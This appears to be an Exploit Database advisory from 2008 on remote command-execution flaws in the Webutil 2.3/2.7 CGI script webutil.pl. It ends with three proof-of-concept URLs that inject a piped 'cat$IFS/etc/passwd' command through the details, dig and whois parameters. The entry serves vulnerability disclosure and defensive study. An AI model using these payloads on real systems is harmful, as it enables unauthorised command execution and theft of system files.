Webutil 2.3/2.7 - 'webutil.pl' Multiple Remote Command Execution Vulnerabilities

EDB-ID:

31466


Author:

Zero X

Type:

webapps


Platform:

CGI

Date:

2008-03-21


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

source: https://www.securityfocus.com/bid/28393/info

Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected application and possibly the underlying computer.

These issues affect Webutil 2.3 and 2.7. 

http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd